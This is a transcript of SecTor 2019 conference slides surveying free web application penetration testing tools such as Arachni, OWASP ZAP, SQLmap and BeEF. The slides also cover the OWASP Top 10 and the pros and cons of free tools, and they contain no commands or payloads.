The Tools of A Web Application Penetration Tester · Arachni •A feature-full, modular,...
Transcript of The Tools of A Web Application Penetration Tester · Arachni •A feature-full, modular,...
The Tools of A Web
Application
Penetration Tester
Chuck Ben-Tzur CISSP, CISM, CRISC, PMP
October 10, 2019
SecTor 2019
Introduction
• A little about me…
• Provide an overview of some free and available tools that can be used
during a web application penetration test.
• Will be using the following:
• Custom PHP web application (www.dardaleh.com)
• Kali Linux (tools are NOT part of the distribution!)
• NOT Metasploit…
Disclaimer
• The views and opinions expressed in this session are based on MY
experience and testing methodology when using these tools.
• If you disagree, it is likely because…
• You worked on different applications/environment/technology stacks
• You used different testing methodology (different goals, approach)
• You used the tools wrong
User/Client Side Server/System Side
Web Application Testing
INPUT
OUTPUT
Penetration Test and OWASP top 10
OWASP top 10
• A1 - Injection
• A2 - Broken Authentication
• A3 - Sensitive Data Exposure
• A4 - XML External Entities (XXE)
• A5 - Broken Access Control
• A6 - Security Misconfiguration
• A7 - Cross-Site Scripting (XSS)
• A8 - Insecure Deserialization
• A9 - Using Components with Known Vulnerabilities
• A10 - Insufficient Logging & Monitoring
Reconnaissance
Enumeration
Vulnerability Analysis
Exploitation
Reporting
Arachni
• A feature-full, modular, high-performance Ruby framework aimed
towards helping penetration testers and administrators evaluate the
security of modern web applications.
• It is free, with its source code public and available for review.
source: https://www.arachni-scanner.com
Demo #1 (Arachni)
Developer Tools
• Chrome DevTools is a set of web developer tools built directly into
the Google Chrome browser.
• DevTools can help you edit pages on-the-fly and diagnose problems
quickly, which ultimately helps you build better websites, faster.
source: https://developers.google.com/web/tools/chrome-devtools
Demo #2 (Dev Tools)
OWASP ZAP
• OWASP (Open Web Application Security Project) ZAP (Zed Attack
Proxy) is an open-source web application security scanner.
• When used as a proxy server it allows the user to manipulate all of
the traffic that passes through it, including traffic using https.
source: https://en.wikipedia.org/wiki/OWASP_ZAP
Demo #3 (ZAP Proxy)
SecLists
• SecLists is a collection of multiple types of lists used during security
assessments, collected in one place. List types include usernames,
passwords, URLs, sensitive data patterns, fuzzing payloads, web
shells, and many more.
source: https://github.com/danielmiessler/SecLists
SecLists (cont.)
SQLmap
• A penetration testing tool that automates the process of detecting
and exploiting SQL injection flaws providing its user interface in the
terminal.
• In addition to mapping and detecting vulnerabilities, the software
enables access to the database, editing and deleting data, and
viewing data in tables.
source: https://en.wikipedia.org/wiki/Sqlmap
• Uses local storage to create a cache of the collected information.
Demo #4 (SQLmap)
BeEF
• BeEF (Browser Exploitation Framework).
• It is a penetration testing tool that focuses on the web browser
source: https://beefproject.com/
Demo #5 (BeEF)
Things to Consider (Pros)
• Perfect for training and one-time projects
• If running multiple tools - allows for results comparison
• Usually very small footprint (or ability to run without install)
• Most tool provide APIs and can be easily integrated with Continuous
Integration activities – great security value.
• Usually extensible – allowing other user to add/enhance functionality
• You can contribute directly and affect the product direction/functionality
• Can’t beat the price!
Things to Consider (Cons)
• No official ownership and support
• Little quality assurance (bugs, vulnerabilities) and response time
• No guarantee of regular updates (or may be completely abandoned)
• A little harder to use (e.g. library dependencies, command lines,
somewhat limited platforms)
• Limited reporting capabilities (e.g. customized reports)
• Malicious users and hackers have access to these too…
Final Thoughts
• These are tools to complement the follow-up (and manual) work:
• Elimination of False Positive findings (there is no SQL injection if there is no Database!)
• Actual penetration test (following up on the “low hanging fruits”)
• Perform threat modeling, assigning risks and reporting
• There are MORE tools out there (e.g. w3af, Nikto)
• Most tools will do more than one thing (scanning, exploiting, built-in payloads)
• There are some good commercial tools out there (free versions, supported, User Interface)
• Special thanks to Erich Samuel for his input…
Thank You